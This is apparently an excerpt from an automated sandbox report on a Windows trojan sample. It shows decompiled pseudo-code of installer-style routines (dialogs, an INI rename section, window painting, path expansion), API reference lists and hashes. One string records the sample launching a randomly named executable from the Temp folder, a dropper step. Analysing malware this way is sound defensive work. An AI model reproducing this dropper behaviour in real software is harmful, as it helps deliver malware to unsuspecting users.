				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                                                              0x00404795
                                                                                              0x004048c2
                                                                                              0x0040491f
                                                                                              0x00404923
                                                                                              0x004049f0
                                                                                              0x004049f2
                                                                                              0x004049f2
                                                                                              0x004049f8
                                                                                              0x004049f8
                                                                                              0x004049fb
                                                                                              0x00000000
                                                                                              0x00404a02
                                                                                              0x00404931
                                                                                              0x00404937
                                                                                              0x00404941
                                                                                              0x0040494c
                                                                                              0x0040494f
                                                                                              0x00404952
                                                                                              0x0040495d
                                                                                              0x00404960
                                                                                              0x00404967
                                                                                              0x00404974
                                                                                              0x00404985
                                                                                              0x0040498b
                                                                                              0x00404993
                                                                                              0x004049a1
                                                                                              0x004049a7
                                                                                              0x004049a7
                                                                                              0x00404967
                                                                                              0x004049b1
                                                                                              0x00000000
                                                                                              0x004049bc
                                                                                              0x004049c0
                                                                                              0x004049d0
                                                                                              0x004049d0
                                                                                              0x004049d6
                                                                                              0x004049e2
                                                                                              0x004049e2
                                                                                              0x00000000
                                                                                              0x004049e6
                                                                                              0x004049b1
                                                                                              0x004048cd
                                                                                              0x00000000
                                                                                              0x004048df
                                                                                              0x004048e4
                                                                                              0x004048ea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404913
                                                                                              0x00404915
                                                                                              0x0040491a
                                                                                              0x00000000
                                                                                              0x0040491a
                                                                                              0x004048cd
                                                                                              0x0040479b
                                                                                              0x0040479e
                                                                                              0x004047a3
                                                                                              0x004047b4
                                                                                              0x004047b4
                                                                                              0x004047bc
                                                                                              0x004047bf
                                                                                              0x004047c3
                                                                                              0x004047c6
                                                                                              0x004047ca
                                                                                              0x004047cd
                                                                                              0x004047d0
                                                                                              0x004047d3
                                                                                              0x004047da
                                                                                              0x004047dc
                                                                                              0x004047dc
                                                                                              0x004047e6
                                                                                              0x004047f3
                                                                                              0x004047fd
                                                                                              0x00404802
                                                                                              0x00404805
                                                                                              0x0040480a
                                                                                              0x00404821
                                                                                              0x00404828
                                                                                              0x0040483b
                                                                                              0x0040483e
                                                                                              0x00404852
                                                                                              0x00404859
                                                                                              0x0040485e
                                                                                              0x00404863
                                                                                              0x00404863
                                                                                              0x00404871
                                                                                              0x0040487f
                                                                                              0x00404891
                                                                                              0x00404896
                                                                                              0x004048a6
                                                                                              0x004048a8
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CheckDlgButton.USER32 ref: 00404821
                                                                                              • GetDlgItem.USER32 ref: 00404835
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                              • GetSysColor.USER32(?), ref: 00404863
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                              • GetDlgItem.USER32 ref: 004048FF
                                                                                              • SendMessageW.USER32(00000000), ref: 00404906
                                                                                              • GetDlgItem.USER32 ref: 00404931
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                              • SetCursor.USER32(00000000), ref: 00404985
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                              • SetCursor.USER32(00000000), ref: 004049A1
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                              Strings
                                                                                              • "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m, xrefs: 00404960
                                                                                              • N, xrefs: 0040491F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m$N
                                                                                              • API String ID: 3103080414-1074781595
                                                                                              • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                              • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                              • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                              • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                              0x004062ae
                                                                                              0x004062b7
                                                                                              0x004062be
                                                                                              0x004062c8
                                                                                              0x004062dc
                                                                                              0x00406304
                                                                                              0x0040630b
                                                                                              0x0040630f
                                                                                              0x00406313
                                                                                              0x00406333
                                                                                              0x0040633a
                                                                                              0x00406344
                                                                                              0x00406351
                                                                                              0x00406356
                                                                                              0x0040635b
                                                                                              0x0040635f
                                                                                              0x0040636e
                                                                                              0x00406370
                                                                                              0x0040637d
                                                                                              0x00406381
                                                                                              0x0040641c
                                                                                              0x00000000
                                                                                              0x00406397
                                                                                              0x004063a4
                                                                                              0x004063c8
                                                                                              0x004063cc
                                                                                              0x004063eb
                                                                                              0x004063ef
                                                                                              0x004063ef
                                                                                              0x004063f1
                                                                                              0x004063fa
                                                                                              0x00406405
                                                                                              0x00406410
                                                                                              0x00406416
                                                                                              0x00000000
                                                                                              0x00406416
                                                                                              0x004063ce
                                                                                              0x004063d1
                                                                                              0x004063dc
                                                                                              0x004063d8
                                                                                              0x004063da
                                                                                              0x004063db
                                                                                              0x004063db
                                                                                              0x004063e3
                                                                                              0x004063e5
                                                                                              0x00000000
                                                                                              0x004063e5
                                                                                              0x004063af
                                                                                              0x004063b5
                                                                                              0x00000000
                                                                                              0x004063b5
                                                                                              0x00406381
                                                                                              0x0040635f
                                                                                              0x004062de
                                                                                              0x004062e9
                                                                                              0x004062f2
                                                                                              0x004062f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004062f6
                                                                                              0x00406427

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                              • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                              • wsprintfA.USER32 ref: 0040632D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                              • GlobalFree.KERNEL32 ref: 00406416
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                              • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                              • API String ID: 2171350718-2295842750
                                                                                              • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                              • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                              • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                              • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 90%
                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                              0x0040100a
                                                                                              0x00401039
                                                                                              0x00401047
                                                                                              0x0040104d
                                                                                              0x00401051
                                                                                              0x0040105b
                                                                                              0x00401061
                                                                                              0x00401064
                                                                                              0x004010f3
                                                                                              0x00401089
                                                                                              0x0040108c
                                                                                              0x004010a6
                                                                                              0x004010bd
                                                                                              0x004010cc
                                                                                              0x004010cf
                                                                                              0x004010d5
                                                                                              0x004010d9
                                                                                              0x004010e4
                                                                                              0x004010ed
                                                                                              0x004010ef
                                                                                              0x004010ef
                                                                                              0x00401100
                                                                                              0x00401105
                                                                                              0x0040110d
                                                                                              0x00401110
                                                                                              0x00401112
                                                                                              0x00401118
                                                                                              0x0040111f
                                                                                              0x00401126
                                                                                              0x00401130
                                                                                              0x00401142
                                                                                              0x00401156
                                                                                              0x00401160
                                                                                              0x00401165
                                                                                              0x00401165
                                                                                              0x00401110
                                                                                              0x0040116e
                                                                                              0x00000000
                                                                                              0x00401178
                                                                                              0x00401010
                                                                                              0x00401013
                                                                                              0x00401015
                                                                                              0x0040101f
                                                                                              0x0040101f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                              • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                              • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                              • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                              0x004066a5
                                                                                              0x004066a5
                                                                                              0x004066a5
                                                                                              0x004066ab
                                                                                              0x004066b0
                                                                                              0x004066c1
                                                                                              0x004066c1
                                                                                              0x004066c9
                                                                                              0x004066ca
                                                                                              0x004066cb
                                                                                              0x004066cc
                                                                                              0x004066cf
                                                                                              0x004066d7
                                                                                              0x004066d9
                                                                                              0x004066ea
                                                                                              0x004066ed
                                                                                              0x004066ed
                                                                                              0x004066f1
                                                                                              0x004066f7
                                                                                              0x004066fa
                                                                                              0x004068d5
                                                                                              0x004068d5
                                                                                              0x004068e0
                                                                                              0x004068ec
                                                                                              0x004068ec
                                                                                              0x00000000
                                                                                              0x00406700
                                                                                              0x00406705
                                                                                              0x0040671a
                                                                                              0x0040671b
                                                                                              0x00406721
                                                                                              0x004068b3
                                                                                              0x004068c1
                                                                                              0x004068c4
                                                                                              0x004068c4
                                                                                              0x004068b5
                                                                                              0x004068b8
                                                                                              0x004068bb
                                                                                              0x004068bd
                                                                                              0x004068bd
                                                                                              0x004068c6
                                                                                              0x004068c6
                                                                                              0x004068cc
                                                                                              0x004068cf
                                                                                              0x00406702
                                                                                              0x00000000
                                                                                              0x00406702
                                                                                              0x00000000
                                                                                              0x004068cf
                                                                                              0x00406727
                                                                                              0x0040672a
                                                                                              0x00406739
                                                                                              0x00406740
                                                                                              0x0040674c
                                                                                              0x0040674f
                                                                                              0x00406752
                                                                                              0x00406753
                                                                                              0x00406758
                                                                                              0x0040675e
                                                                                              0x00406761
                                                                                              0x00406764
                                                                                              0x00406857
                                                                                              0x0040685c
                                                                                              0x0040688f
                                                                                              0x00406894
                                                                                              0x00406899
                                                                                              0x0040689e
                                                                                              0x0040689e
                                                                                              0x004068a3
                                                                                              0x004068a9
                                                                                              0x004068ac
                                                                                              0x00000000
                                                                                              0x004068ac
                                                                                              0x0040685e
                                                                                              0x00406861
                                                                                              0x00406864
                                                                                              0x00406879
                                                                                              0x00406880
                                                                                              0x00406866
                                                                                              0x0040686d
                                                                                              0x0040686d
                                                                                              0x00406888
                                                                                              0x0040688b
                                                                                              0x0040684f
                                                                                              0x00406850
                                                                                              0x00406850
                                                                                              0x00000000
                                                                                              0x0040688b
                                                                                              0x00406771
                                                                                              0x00406775
                                                                                              0x00406775
                                                                                              0x00406776
                                                                                              0x00406778
                                                                                              0x004067b5
                                                                                              0x004067b8
                                                                                              0x004067c8
                                                                                              0x004067cb
                                                                                              0x004067d3
                                                                                              0x004067d9
                                                                                              0x004067d9
                                                                                              0x00406834
                                                                                              0x00406834
                                                                                              0x00406836
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067dd
                                                                                              0x004067e2
                                                                                              0x004067e3
                                                                                              0x004067e5
                                                                                              0x004067fc
                                                                                              0x0040680a
                                                                                              0x00406810
                                                                                              0x00406812
                                                                                              0x00406830
                                                                                              0x00406830
                                                                                              0x00406830
                                                                                              0x00000000
                                                                                              0x00406830
                                                                                              0x00406818
                                                                                              0x00406821
                                                                                              0x00406824
                                                                                              0x0040682a
                                                                                              0x0040682e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040682e
                                                                                              0x004067f6
                                                                                              0x004067f8
                                                                                              0x004067fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067fa
                                                                                              0x00000000
                                                                                              0x00406834
                                                                                              0x004067c0
                                                                                              0x00000000
                                                                                              0x0040677a
                                                                                              0x00406798
                                                                                              0x004067a1
                                                                                              0x0040683e
                                                                                              0x00406842
                                                                                              0x0040684a
                                                                                              0x0040684a
                                                                                              0x00000000
                                                                                              0x00406842
                                                                                              0x004067ab
                                                                                              0x00406838
                                                                                              0x0040683c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040683c
                                                                                              0x00406778
                                                                                              0x00000000
                                                                                              0x00406705

                                                                                              APIs
